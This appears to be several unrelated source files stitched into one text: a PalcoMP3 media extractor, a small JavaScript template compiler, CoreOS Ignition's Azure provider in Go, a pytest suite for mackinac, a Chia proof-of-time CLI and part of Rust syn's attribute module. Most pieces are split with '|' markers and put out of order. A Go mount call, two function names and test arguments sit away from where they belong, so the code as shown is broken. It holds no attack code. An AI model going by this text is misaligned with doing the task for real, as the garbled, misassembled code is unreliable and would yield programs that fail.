from __future__ import unicode_literals
import re
from ..compat import compat_str
from ..utils import int_or_none, str_or_none, try_get
from .common import InfoExtractor
class PalcoMP3BaseIE(InfoExtractor):
_GQL_QUERY_TMPL = """{
artist(slug: "%s") {
%s
}
}"""
_ARTIST_FIELDS_TMPL = """music(slug: "%%s") {
%s
}"""
_MUSIC_FIELDS = """duration
hls
mp3File
musicID
plays
title"""
def _call_api(self, artist_slug, artist_fields):
return self._download_json(
"https://www.palcomp3.com.br/graphql/",
artist_slug,
query={
"query": self._GQL_QUERY_TMPL % (artist_slug, artist_fields),
},
)["data"]
def _parse_music(self, music):
music_id = compat_str(music["musicID"])
title = music["title"]
formats = []
hls_url = music.get("hls")
if hls_url:
formats.append(
{
"url": hls_url,
"protocol": "m3u8_native",
"ext": "mp4",
}
)
mp3_file = music.get("mp3File")
if mp3_file:
formats.append(
{
"url": mp3_file,
}
)
return {
"id": music_id,
"title": title,
"formats": formats,
"duration": int_or_none(music.get("duration")),
"view_count": int_or_none(music.get("plays")),
}
def _real_initialize(self):
self._ARTIST_FIELDS_TMPL = self._ARTIST_FIELDS_TMPL % self._MUSIC_FIELDS
def _real_extract(self, url):
artist_slug, music_slug = re.match(self._VALID_URL, url).groups()
artist_fields = self._ARTIST_FIELDS_TMPL % music_slug
music = self._call_api(artist_slug, artist_fields)["artist"]["music"]
return self._parse_music(music)
class PalcoMP3IE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:song"
_VALID_URL = (
r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<artist>[^/]+)/(?P<id>[^/?&#]+)"
)
_TESTS = [
{
"url": "https://www.palcomp3.com/maiaraemaraisaoficial/nossas-composicoes-cuida-bem-dela/",
"md5": "99fd6405b2d8fd589670f6db1ba3b358",
"info_dict": {
"id": "3162927",
"ext": "mp3",
"title": "Nossas Composições - CUIDA BEM DELA",
"duration": 210,
"view_count": int,
},
}
] | @classmethod
def suitable(cls, url):
return (
False
if PalcoMP3VideoIE.suitable(url)
else super(PalcoMP3IE, cls).suitable(url)
)
class PalcoMP3ArtistIE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:artist"
_VALID_URL = r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<id>[^/?&#]+)"
_TESTS = [
{
"url": "https://www.palcomp3.com.br/condedoforro/",
"info_dict": {
"id": "358396",
"title": "Conde do Forró",
},
"playlist_mincount": 188,
}
]
_ARTIST_FIELDS_TMPL = """artistID
musics {
nodes {
%s
}
}
name"""
@classmethod
def suitable(cls, url):
return (
False
if re.match(PalcoMP3IE._VALID_URL, url)
else super(PalcoMP3ArtistIE, cls).suitable(url)
)
def _real_extract(self, url):
artist_slug = self._match_id(url)
artist = self._call_api(artist_slug, self._ARTIST_FIELDS_TMPL)["artist"]
def entries():
for music in try_get(artist, lambda x: x["musics"]["nodes"], list) or []:
yield self._parse_music(music)
return self.playlist_result(
entries(), str_or_none(artist.get("artistID")), artist.get("name")
)
class PalcoMP3VideoIE(PalcoMP3BaseIE):
IE_NAME = "PalcoMP3:video"
_VALID_URL = r"https?://(?:www\.)?palcomp3\.com(?:\.br)?/(?P<artist>[^/]+)/(?P<id>[^/?&#]+)/?#clipe"
_TESTS = [
{
"url": "https://www.palcomp3.com/maiaraemaraisaoficial/maiara-e-maraisa-voce-faz-falta-aqui-ao-vivo-em-vicosa-mg/#clipe",
"add_ie": ["Youtube"],
"info_dict": {
"id": "_pD1nR2qqPg",
"ext": "mp4",
"title": "Maiara e Maraisa - Você Faz Falta Aqui - DVD Ao Vivo Em Campo Grande",
"description": "md5:7043342c09a224598e93546e98e49282",
"upload_date": "20161107",
"uploader_id": "maiaramaraisaoficial",
"uploader": "Maiara e Maraisa",
},
}
]
_MUSIC_FIELDS = "youtubeID"
def _parse_music(self, music):
youtube_id = music["youtubeID"]
return self.url_result(youtube_id, "Youtube", youtube_id) | |
index.js | import DistanceItem from './DistanceItem' |
export default DistanceItem |
|
ASTCompiler.js | function Compile (el, templateDescriptor, model, options) {
this.model = model
this.$vm = Object.assign({}, model.data, model.methods, options.inject)
this.$el = document.querySelector(el)
if (this.$el) {
this.$fragment = this.node2Fragment()
this.init(templateDescriptor)
this.$el.appendChild(this.$fragment)
}
} | function createElement (tag, data, childrens = []) {
const dom = document.createElement(tag)
const attrs = (data && data.attrs) ? data.attrs : {}
Object.keys(attrs).forEach((attr) => {
dom.setAttribute(attr, data.attrs[attr])
})
if (data && (data.class || data.staticClass)) {
dom.setAttribute('class', ((data.class ? data.class : ' ') + ' ' + (data.staticClass ? data.staticClass : ' ')).trim())
}
childrens && childrens.forEach((child) => {
dom.appendChild(child)
})
return dom
}
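// Illustrative: createElement('div', { attrs: { id: 'app' }, staticClass: 'box' },
// [document.createTextNode('hi')]) builds <div id="app" class="box">hi</div>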
Compile.prototype = {
node2Fragment: function () {
var fragment = document.createDocumentFragment()
return fragment
},
init: function (templateDescriptor) {
this.$vm.ast = templateDescriptor.ast
this.$vm.render = new Function(templateDescriptor.render)
this.$vm._c = createElement
this.$vm._e = document.createComment.bind(document, '')
// this.$vm._v = document.createTextNode;
this.$vm._v = document.createTextNode.bind(document)
this.$vm._s = (str) => {
return `${str.toString()}`
}
let res = this.$vm.render()
this.$fragment.appendChild(res)
this.compileElement(this.$fragment, [this.$vm.ast])
this.model.mounted.call(this.$vm)
},
compileElement: function (el, ast) {
var childNodes = el.childNodes;
[].slice.call(childNodes).forEach((node, index) => {
if (this.isElementNode(node) || this.isTextNode(node)) {
this.compile(node, ast[index])
}
if (node.childNodes && node.childNodes.length) {
this.compileElement(node, ast[index].children)
}
})
},
compile: function (node, ast) {
if (ast.events) {
const self = this
Object.keys(ast.events).forEach((event) => {
if (event === 'click') {
const exp = ast.events[event].value
const fn = self.$vm[exp]
node.addEventListener('click', fn.bind(self.$vm), false)
}
if (event === 'mousedown') {
const exp = ast.events[event].value
const fn = self.$vm[exp]
node.addEventListener('mousedown', fn.bind(self.$vm), false)
}
})
}
},
isDirective: function (attr) {
return attr.indexOf('v-') === 0
},
isEventDirective: function (dir) {
return dir.indexOf('on') === 0
},
isElementNode: function (node) {
return node.nodeType === 1
},
isTextNode: function (node) {
return node.nodeType === 3
}
}
export default Compile | |
azure.go | // Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// The azure provider fetches a configuration from the Azure OVF DVD.
package azure
import (
"fmt"
"io/ioutil"
"os"
"path/filepath"
"syscall"
"time"
"github.com/coreos/ignition/config/types"
"github.com/coreos/ignition/config/validate/report"
"github.com/coreos/ignition/internal/log"
"github.com/coreos/ignition/internal/providers/util"
"github.com/coreos/ignition/internal/resource"
)
const (
configDevice = "/dev/disk/by-id/ata-Virtual_CD"
configPath = "/CustomData.bin"
)
// These constants come from <cdrom.h>.
const (
CDROM_DRIVE_STATUS = 0x5326
)
// These constants come from <cdrom.h>.
const (
CDS_NO_INFO = iota
CDS_NO_DISC
CDS_TRAY_OPEN
CDS_DRIVE_NOT_READY
CDS_DISC_OK
)
func FetchConfig(f resource.Fetcher) (types.Config, report.Report, error) {
logger := f.Logger
logger.Debug("waiting for config DVD...")
waitForCdrom(logger)
mnt, err := ioutil.TempDir("", "ignition-azure")
if err != nil {
return types.Config{}, report.Report{}, fmt.Errorf("failed to create temp directory: %v", err)
}
defer os.Remove(mnt)
| ); err != nil {
return types.Config{}, report.Report{}, fmt.Errorf("failed to mount device %q at %q: %v", configDevice, mnt, err)
}
defer logger.LogOp(
func() error { return syscall.Unmount(mnt, 0) },
"unmounting %q at %q", configDevice, mnt,
)
logger.Debug("reading config")
rawConfig, err := ioutil.ReadFile(filepath.Join(mnt, configPath))
if err != nil && !os.IsNotExist(err) {
return types.Config{}, report.Report{}, fmt.Errorf("failed to read config: %v", err)
}
return util.ParseConfig(logger, rawConfig)
}
func waitForCdrom(logger *log.Logger) {
for !isCdromPresent(logger) {
time.Sleep(time.Second)
}
}
func isCdromPresent(logger *log.Logger) bool {
logger.Debug("opening config device")
device, err := os.Open(configDevice)
if err != nil {
logger.Info("failed to open config device: %v", err)
return false
}
defer device.Close()
logger.Debug("getting drive status")
status, _, errno := syscall.Syscall(
syscall.SYS_IOCTL,
uintptr(device.Fd()),
uintptr(CDROM_DRIVE_STATUS),
uintptr(0),
)
switch status {
case CDS_NO_INFO:
logger.Info("drive status: no info")
case CDS_NO_DISC:
logger.Info("drive status: no disc")
case CDS_TRAY_OPEN:
logger.Info("drive status: open")
case CDS_DRIVE_NOT_READY:
logger.Info("drive status: not ready")
case CDS_DISC_OK:
logger.Info("drive status: OK")
default:
logger.Err("failed to get drive status: %s", errno.Error())
}
return (status == CDS_DISC_OK)
} | logger.Debug("mounting config device")
if err := logger.LogOp(
func() error { return syscall.Mount(configDevice, mnt, "udf", syscall.MS_RDONLY, "") },
"mounting %q at %q", configDevice, mnt, |
test_reconstruct.py | import pytest
from os.path import join
import mackinac
@pytest.mark.usefixtures('download_data')
class TestReconstruct:
def test_reconstruct_features(self, universal_folder, bacteria_folder, b_theta_features,
b_theta_summary, b_theta_id):
template = mackinac.create_template_model(
universal_folder,
bacteria_folder,
'bacteria',
'Bacteria template')
model = mackinac.reconstruct_model_from_features( | 'negbio',
gc_content=b_theta_summary['gc_content'] / 100.0
)
assert model.id == b_theta_id
assert len(model.reactions) == 923 # Value can change if genome annotation changes
assert len(model.metabolites) == 999 # Value can change if genome annotation changes
assert len(model.compartments) == 2
def test_reconstruct_likelihoods(self, universal_folder, bacteria_folder, b_theta_features,
b_theta_summary, b_theta_id, search_program_path,
search_db_path, fid_role_path, work_folder):
template = mackinac.create_template_model(
universal_folder,
bacteria_folder,
'bacteria',
'Bacteria template')
likelihoods = mackinac.calculate_likelihoods(
b_theta_id,
b_theta_features,
template,
search_program_path=search_program_path,
search_db_path=search_db_path,
fid_role_path=fid_role_path,
work_folder=work_folder)
assert len(likelihoods.reaction_values) == 5652
assert likelihoods.reaction_values['rxn00006']['likelihood'] == 0.0
        assert likelihoods.reaction_values['rxn14380']['likelihood'] == pytest.approx(0.9594912486067599)
model = mackinac.reconstruct_model_from_likelihoods(
likelihoods,
template,
b_theta_id,
'negbio',
gc_content=b_theta_summary['gc_content'] / 100.0
)
assert model.id == b_theta_id
assert len(model.reactions) == 1164 # Value can change if genome annotation changes
assert len(model.metabolites) == 1260 # Value can change if genome annotation changes
assert len(model.compartments) == 2 | b_theta_features,
template,
b_theta_id, |
cmds.py | import argparse
import binascii
import sys
import time
from inkfish.proof_of_time import (create_proof_of_time_wesolowski,
create_proof_of_time_nwesolowski,
create_proof_of_time_pietrzak,
check_proof_of_time_wesolowski,
check_proof_of_time_nwesolowski,
check_proof_of_time_pietrzak)
from .classgroup import ClassGroup
from .create_discriminant import create_discriminant
def | ():
parser = argparse.ArgumentParser(
description='Generate or verify a proof of time using the Chia ' +
                    'Verifiable Delay Function (VDF)',
)
parser.add_argument("-t", "--type", default="wesolowski",
choices=["wesolowski", "n-wesolowski", "pietrzak"],
help="the type of proof, wesolowski, n-wesolowski, or pietrzak")
parser.add_argument("-l", "--length", type=int, default=2048,
help="the number of bits of the discriminant")
parser.add_argument("-d", "--depth", type=int, default=2,
help="depth of n-wesolowski (n) default is 2")
parser.add_argument("-v", "--verbose", action="store_true",
help="print a bunch of extra stuff about the proof")
parser.add_argument("discriminant_challenge", type=binascii.unhexlify,
help="a hex-encoded challenge used to derive the discriminant")
parser.add_argument("iterations", type=int,
help="number of iterations")
parser.add_argument("proof", type=binascii.unhexlify,
help="the hex-encoded proof", nargs="?")
return parser
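# Illustrative CLI usage (hypothetical challenge hex):
#   pot -t wesolowski -l 2048 a4c3 10000           # create: prints result+proof hex
#   pot -t wesolowski -l 2048 a4c3 10000 <hex>     # verify: checks the given proof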
def pot(args=sys.argv):
parser = create_pot_parser()
args = parser.parse_args(args=args[1:])
discriminant = create_discriminant(args.discriminant_challenge, args.length)
if args.verbose:
print("proof type: %s" % args.type)
print("discriminant: %s" % discriminant)
print("discriminant size: %s" % args.length)
# Generator element is created as a=2, b=1.
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
if args.verbose:
print("x: %s" % str(x))
if args.proof:
if args.type == "wesolowski":
ok = check_proof_of_time_wesolowski(
discriminant, x, args.proof, args.iterations, args.length)
elif args.type == "n-wesolowski":
ok = check_proof_of_time_nwesolowski(
discriminant, x, args.proof, args.iterations, args.length)
elif args.type == "pietrzak":
ok = check_proof_of_time_pietrzak(
discriminant, x, args.proof, args.iterations, args.length)
if ok:
print("Proof is valid")
else:
print("** INVALID PROOF")
return -1
else:
start_t = time.time() * 1000
if args.type == "wesolowski":
result, proof = create_proof_of_time_wesolowski(
discriminant, x, args.iterations, args.length)
elif args.type == "n-wesolowski":
result, proof = create_proof_of_time_nwesolowski(
discriminant, x, args.iterations, args.length, args.depth, 0)
elif args.type == "pietrzak":
result, proof = create_proof_of_time_pietrzak(
discriminant, x, args.iterations, args.length)
if args.verbose:
print("Finished in ", round(((time.time() * 1000) - start_t), 2), "ms")
hex_result = binascii.hexlify(result).decode("utf8")
hex_proof = binascii.hexlify(proof).decode("utf8")
print(hex_result + hex_proof)
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| create_pot_parser |
attr.rs | use super::*;
use crate::punctuated::Punctuated;
use proc_macro2::TokenStream;
use std::iter;
#[cfg(feature = "parsing")]
use crate::parse::{Parse, ParseBuffer, ParseStream, Parser, Result};
#[cfg(feature = "parsing")]
use crate::punctuated::Pair;
ast_struct! {
/// An attribute like `#[repr(transparent)]`.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// <br>
///
/// # Syntax
///
/// Rust has six types of attributes.
///
/// - Outer attributes like `#[repr(transparent)]`. These appear outside or
/// in front of the item they describe.
/// - Inner attributes like `#![feature(proc_macro)]`. These appear inside
/// of the item they describe, usually a module.
/// - Outer doc comments like `/// # Example`.
/// - Inner doc comments like `//! Please file an issue`.
/// - Outer block comments `/** # Example */`.
/// - Inner block comments `/*! Please file an issue */`.
///
/// The `style` field of type `AttrStyle` distinguishes whether an attribute
/// is outer or inner. Doc comments and block comments are promoted to
/// attributes, as this is how they are processed by the compiler and by
/// `macro_rules!` macros.
///
/// The `path` field gives the possibly colon-delimited path against which
/// the attribute is resolved. It is equal to `"doc"` for desugared doc
/// comments. The `tokens` field contains the rest of the attribute body as
/// tokens.
///
/// ```text
/// #[derive(Copy)] #[crate::precondition x < 5]
/// ^^^^^^~~~~~~ ^^^^^^^^^^^^^^^^^^^ ~~~~~
/// path tokens path tokens
/// ```
///
/// <br>
///
/// # Parsing from tokens to Attribute
///
/// This type does not implement the [`Parse`] trait and thus cannot be
/// parsed directly by [`ParseStream::parse`]. Instead use
/// [`ParseStream::call`] with one of the two parser functions
/// [`Attribute::parse_outer`] or [`Attribute::parse_inner`] depending on
/// which you intend to parse.
///
/// [`Parse`]: parse::Parse
/// [`ParseStream::parse`]: parse::ParseBuffer::parse
/// [`ParseStream::call`]: parse::ParseBuffer::call
///
/// ```
/// use syn::{Attribute, Ident, Result, Token};
/// use syn::parse::{Parse, ParseStream};
///
/// // Parses a unit struct with attributes.
/// //
/// // #[path = "s.tmpl"]
/// // struct S;
/// struct UnitStruct {
/// attrs: Vec<Attribute>,
/// struct_token: Token![struct],
/// name: Ident,
/// semi_token: Token![;],
/// }
///
/// impl Parse for UnitStruct {
/// fn parse(input: ParseStream) -> Result<Self> {
/// Ok(UnitStruct {
/// attrs: input.call(Attribute::parse_outer)?,
/// struct_token: input.parse()?,
/// name: input.parse()?,
/// semi_token: input.parse()?,
/// })
/// }
/// }
/// ```
///
/// <p><br></p>
///
/// # Parsing from Attribute to structured arguments
///
/// The grammar of attributes in Rust is very flexible, which makes the
/// syntax tree not that useful on its own. In particular, arguments of the
/// attribute are held in an arbitrary `tokens: TokenStream`. Macros are
/// expected to check the `path` of the attribute, decide whether they
/// recognize it, and then parse the remaining tokens according to whatever
/// grammar they wish to require for that kind of attribute.
///
/// If the attribute you are parsing is expected to conform to the
/// conventional structured form of attribute, use [`parse_meta()`] to
/// obtain that structured representation. If the attribute follows some
/// other grammar of its own, use [`parse_args()`] to parse that into the
/// expected data structure.
///
/// [`parse_meta()`]: Attribute::parse_meta
/// [`parse_args()`]: Attribute::parse_args
///
/// <p><br></p>
///
/// # Doc comments
///
/// The compiler transforms doc comments, such as `/// comment` and `/*!
/// comment */`, into attributes before macros are expanded. Each comment is
/// expanded into an attribute of the form `#[doc = r"comment"]`.
///
/// As an example, the following `mod` items are expanded identically:
///
/// ```
/// # use syn::{ItemMod, parse_quote};
/// let doc: ItemMod = parse_quote! {
/// /// Single line doc comments
/// /// We write so many!
/// /**
/// * Multi-line comments...
/// * May span many lines
/// */
/// mod example {
/// //! Of course, they can be inner too
/// /*! And fit in a single line */
/// }
/// };
/// let attr: ItemMod = parse_quote! {
/// #[doc = r" Single line doc comments"]
/// #[doc = r" We write so many!"]
/// #[doc = r"
/// * Multi-line comments...
/// * May span many lines
/// "]
/// mod example {
/// #![doc = r" Of course, they can be inner too"]
/// #![doc = r" And fit in a single line "]
/// }
/// };
/// assert_eq!(doc, attr);
/// ```
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct Attribute {
pub pound_token: Token![#],
pub style: AttrStyle,
pub bracket_token: token::Bracket,
pub path: Path,
pub tokens: TokenStream,
}
}
impl Attribute {
/// Parses the content of the attribute, consisting of the path and tokens,
/// as a [`Meta`] if possible.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_meta(&self) -> Result<Meta> {
fn clone_ident_segment(segment: &PathSegment) -> PathSegment {
PathSegment {
ident: segment.ident.clone(),
arguments: PathArguments::None,
}
}
let path = Path {
leading_colon: self
.path
.leading_colon
.as_ref()
                .map(|colon| Token![::](colon.spans)),
segments: self
.path
.segments
.pairs()
.map(|pair| match pair {
Pair::Punctuated(seg, punct) => {
                    Pair::Punctuated(clone_ident_segment(seg), Token![::](punct.spans))
}
Pair::End(seg) => Pair::End(clone_ident_segment(seg)),
})
.collect(),
};
let parser = |input: ParseStream| parsing::parse_meta_after_path(path, input);
parse::Parser::parse2(parser, self.tokens.clone())
}
/// Parse the arguments to the attribute as a syntax tree.
///
/// This is similar to `syn::parse2::<T>(attr.tokens)` except that:
///
/// - the surrounding delimiters are *not* included in the input to the
/// parser; and
/// - the error message has a more useful span when `tokens` is empty.
///
/// ```text
/// #[my_attr(value < 5)]
/// ^^^^^^^^^ what gets parsed
/// ```
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_args<T: Parse>(&self) -> Result<T> {
self.parse_args_with(T::parse)
}
/// Parse the arguments to the attribute using the given parser.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_args_with<F: Parser>(&self, parser: F) -> Result<F::Output> {
let parser = |input: ParseStream| {
let args = enter_args(self, input)?;
parse::parse_stream(parser, &args)
};
parser.parse2(self.tokens.clone())
}
/// Parses zero or more outer attributes from the stream.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_outer(input: ParseStream) -> Result<Vec<Self>> {
let mut attrs = Vec::new();
while input.peek(Token![#]) {
attrs.push(input.call(parsing::single_parse_outer)?);
}
Ok(attrs)
}
/// Parses zero or more inner attributes from the stream.
///
/// *This function is available only if Syn is built with the `"parsing"`
/// feature.*
#[cfg(feature = "parsing")]
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
pub fn parse_inner(input: ParseStream) -> Result<Vec<Self>> {
let mut attrs = Vec::new();
while input.peek(Token![#]) && input.peek2(Token![!]) {
attrs.push(input.call(parsing::single_parse_inner)?);
}
Ok(attrs)
}
}
#[cfg(feature = "parsing")]
fn expected_parentheses(attr: &Attribute) -> String {
let style = match attr.style {
AttrStyle::Outer => "#",
AttrStyle::Inner(_) => "#!",
};
let mut path = String::new();
for segment in &attr.path.segments {
if !path.is_empty() || attr.path.leading_colon.is_some() {
path += "::";
}
path += &segment.ident.to_string();
}
format!("{}[{}(...)]", style, path)
}
#[cfg(feature = "parsing")]
fn enter_args<'a>(attr: &Attribute, input: ParseStream<'a>) -> Result<ParseBuffer<'a>> {
if input.is_empty() {
let expected = expected_parentheses(attr);
let msg = format!("expected attribute arguments in parentheses: {}", expected);
return Err(crate::error::new2(
attr.pound_token.span,
attr.bracket_token.span,
msg,
));
} else if input.peek(Token![=]) {
let expected = expected_parentheses(attr);
let msg = format!("expected parentheses: {}", expected);
return Err(input.error(msg));
};
let content;
if input.peek(token::Paren) {
parenthesized!(content in input);
} else if input.peek(token::Bracket) {
bracketed!(content in input);
} else if input.peek(token::Brace) {
braced!(content in input);
} else {
return Err(input.error("unexpected token in attribute arguments"));
}
if input.is_empty() {
Ok(content)
} else {
Err(input.error("unexpected token in attribute arguments"))
}
}
ast_enum! {
/// Distinguishes between attributes that decorate an item and attributes
/// that are contained within an item.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// # Outer attributes
///
/// - `#[repr(transparent)]`
/// - `/// # Example`
/// - `/** Please file an issue */`
///
/// # Inner attributes
///
/// - `#![feature(proc_macro)]`
/// - `//! # Example`
/// - `/*! Please file an issue */`
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum AttrStyle {
Outer,
Inner(Token![!]),
}
}
ast_enum_of_structs! {
/// Content of a compile-time structured attribute.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
///
/// ## Path
///
/// A meta path is like the `test` in `#[test]`.
///
/// ## List
///
/// A meta list is like the `derive(Copy)` in `#[derive(Copy)]`.
///
/// ## NameValue
///
/// A name-value meta is like the `path = "..."` in `#[path =
/// "sys/windows.rs"]`.
///
/// # Syntax tree enum
///
/// This type is a [syntax tree enum].
///
/// [syntax tree enum]: Expr#syntax-tree-enums
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum Meta {
Path(Path),
/// A structured list within an attribute, like `derive(Copy, Clone)`.
List(MetaList),
/// A name-value pair within an attribute, like `feature = "nightly"`.
NameValue(MetaNameValue),
}
}
ast_struct! {
/// A structured list within an attribute, like `derive(Copy, Clone)`.
///
/// *This type is available only if Syn is built with the `"derive"` or
/// `"full"` feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct MetaList {
pub path: Path,
pub paren_token: token::Paren,
pub nested: Punctuated<NestedMeta, Token![,]>,
}
}
ast_struct! {
/// A name-value pair within an attribute, like `feature = "nightly"`.
///
/// *This type is available only if Syn is built with the `"derive"` or
/// `"full"` feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub struct MetaNameValue {
pub path: Path,
pub eq_token: Token![=],
pub lit: Lit,
}
}
impl Meta {
/// Returns the identifier that begins this structured meta item.
///
/// For example this would return the `test` in `#[test]`, the `derive` in
/// `#[derive(Copy)]`, and the `path` in `#[path = "sys/windows.rs"]`.
pub fn path(&self) -> &Path {
match self {
Meta::Path(path) => path,
Meta::List(meta) => &meta.path,
Meta::NameValue(meta) => &meta.path,
}
}
}
ast_enum_of_structs! {
/// Element of a compile-time attribute list.
///
/// *This type is available only if Syn is built with the `"derive"` or `"full"`
/// feature.*
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub enum NestedMeta {
/// A structured meta item, like the `Copy` in `#[derive(Copy)]` which
/// would be a nested `Meta::Path`.
Meta(Meta),
/// A Rust literal, like the `"new_name"` in `#[rename("new_name")]`.
Lit(Lit),
}
}
/// Conventional argument type associated with an invocation of an attribute
/// macro.
///
/// For example if we are developing an attribute macro that is intended to be
/// invoked on function items as follows:
///
/// ```
/// # const IGNORE: &str = stringify! {
/// #[my_attribute(path = "/v1/refresh")]
/// # };
/// pub fn refresh() {
/// /* ... */
/// }
/// ```
///
/// The implementation of this macro would want to parse its attribute arguments
/// as type `AttributeArgs`.
///
/// ```
/// # extern crate proc_macro;
/// #
/// use proc_macro::TokenStream;
/// use syn::{parse_macro_input, AttributeArgs, ItemFn};
///
/// # const IGNORE: &str = stringify! {
/// #[proc_macro_attribute]
/// # };
/// pub fn my_attribute(args: TokenStream, input: TokenStream) -> TokenStream {
/// let args = parse_macro_input!(args as AttributeArgs);
/// let input = parse_macro_input!(input as ItemFn);
///
/// /* ... */
/// # "".parse().unwrap()
/// }
/// ```
#[cfg_attr(doc_cfg, doc(cfg(any(feature = "full", feature = "derive"))))]
pub type AttributeArgs = Vec<NestedMeta>;
pub trait FilterAttrs<'a> {
type Ret: Iterator<Item = &'a Attribute>;
fn outer(self) -> Self::Ret;
fn inner(self) -> Self::Ret;
}
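// Illustrative (assuming `item` has an `attrs: Vec<Attribute>` field):
// `let outer: Vec<&Attribute> = item.attrs.iter().outer().collect();`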
impl<'a, T> FilterAttrs<'a> for T
where
T: IntoIterator<Item = &'a Attribute>,
{
type Ret = iter::Filter<T::IntoIter, fn(&&Attribute) -> bool>;
fn outer(self) -> Self::Ret {
fn is_outer(attr: &&Attribute) -> bool {
match attr.style {
AttrStyle::Outer => true,
AttrStyle::Inner(_) => false,
}
}
self.into_iter().filter(is_outer)
}
fn inner(self) -> Self::Ret {
fn is_inner(attr: &&Attribute) -> bool {
match attr.style {
AttrStyle::Inner(_) => true,
AttrStyle::Outer => false,
}
}
self.into_iter().filter(is_inner)
}
}
#[cfg(feature = "parsing")]
pub mod parsing {
use super::*;
use crate::ext::IdentExt;
use crate::parse::{Parse, ParseStream, Result};
#[cfg(feature = "full")]
use crate::private;
pub fn single_parse_inner(input: ParseStream) -> Result<Attribute> {
let content;
Ok(Attribute {
pound_token: input.parse()?,
style: AttrStyle::Inner(input.parse()?),
bracket_token: bracketed!(content in input),
path: content.call(Path::parse_mod_style)?,
tokens: content.parse()?,
})
}
pub fn single_parse_outer(input: ParseStream) -> Result<Attribute> {
let content;
Ok(Attribute {
pound_token: input.parse()?,
style: AttrStyle::Outer,
bracket_token: bracketed!(content in input),
path: content.call(Path::parse_mod_style)?,
tokens: content.parse()?,
})
}
#[cfg(feature = "full")]
impl private {
pub(crate) fn attrs(outer: Vec<Attribute>, inner: Vec<Attribute>) -> Vec<Attribute> {
let mut attrs = outer;
attrs.extend(inner);
attrs
}
}
// Like Path::parse_mod_style but accepts keywords in the path.
fn parse_meta_path(input: ParseStream) -> Result<Path> {
Ok(Path {
leading_colon: input.parse()?,
segments: {
let mut segments = Punctuated::new();
while input.peek(Ident::peek_any) {
let ident = Ident::parse_any(input)?;
segments.push_value(PathSegment::from(ident));
if !input.peek(Token![::]) {
break;
}
let punct = input.parse()?;
segments.push_punct(punct);
}
if segments.is_empty() {
return Err(input.error("expected path"));
} else if segments.trailing_punct() {
return Err(input.error("expected path segment"));
}
segments
},
})
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for Meta {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for MetaList {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_list_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for MetaNameValue {
fn parse(input: ParseStream) -> Result<Self> {
let path = input.call(parse_meta_path)?;
parse_meta_name_value_after_path(path, input)
}
}
#[cfg_attr(doc_cfg, doc(cfg(feature = "parsing")))]
impl Parse for NestedMeta {
fn parse(input: ParseStream) -> Result<Self> {
if input.peek(Lit) && !(input.peek(LitBool) && input.peek2(Token![=])) {
input.parse().map(NestedMeta::Lit)
} else if input.peek(Ident::peek_any)
|| input.peek(Token![::]) && input.peek3(Ident::peek_any)
{
input.parse().map(NestedMeta::Meta)
} else {
Err(input.error("expected identifier or literal"))
}
}
}
pub fn | (path: Path, input: ParseStream) -> Result<Meta> {
if input.peek(token::Paren) {
parse_meta_list_after_path(path, input).map(Meta::List)
} else if input.peek(Token![=]) {
parse_meta_name_value_after_path(path, input).map(Meta::NameValue)
} else {
Ok(Meta::Path(path))
}
}
fn parse_meta_list_after_path(path: Path, input: ParseStream) -> Result<MetaList> {
let content;
Ok(MetaList {
path,
paren_token: parenthesized!(content in input),
nested: content.parse_terminated(NestedMeta::parse)?,
})
}
fn parse_meta_name_value_after_path(path: Path, input: ParseStream) -> Result<MetaNameValue> {
Ok(MetaNameValue {
path,
eq_token: input.parse()?,
lit: input.parse()?,
})
}
}
#[cfg(feature = "printing")]
mod printing {
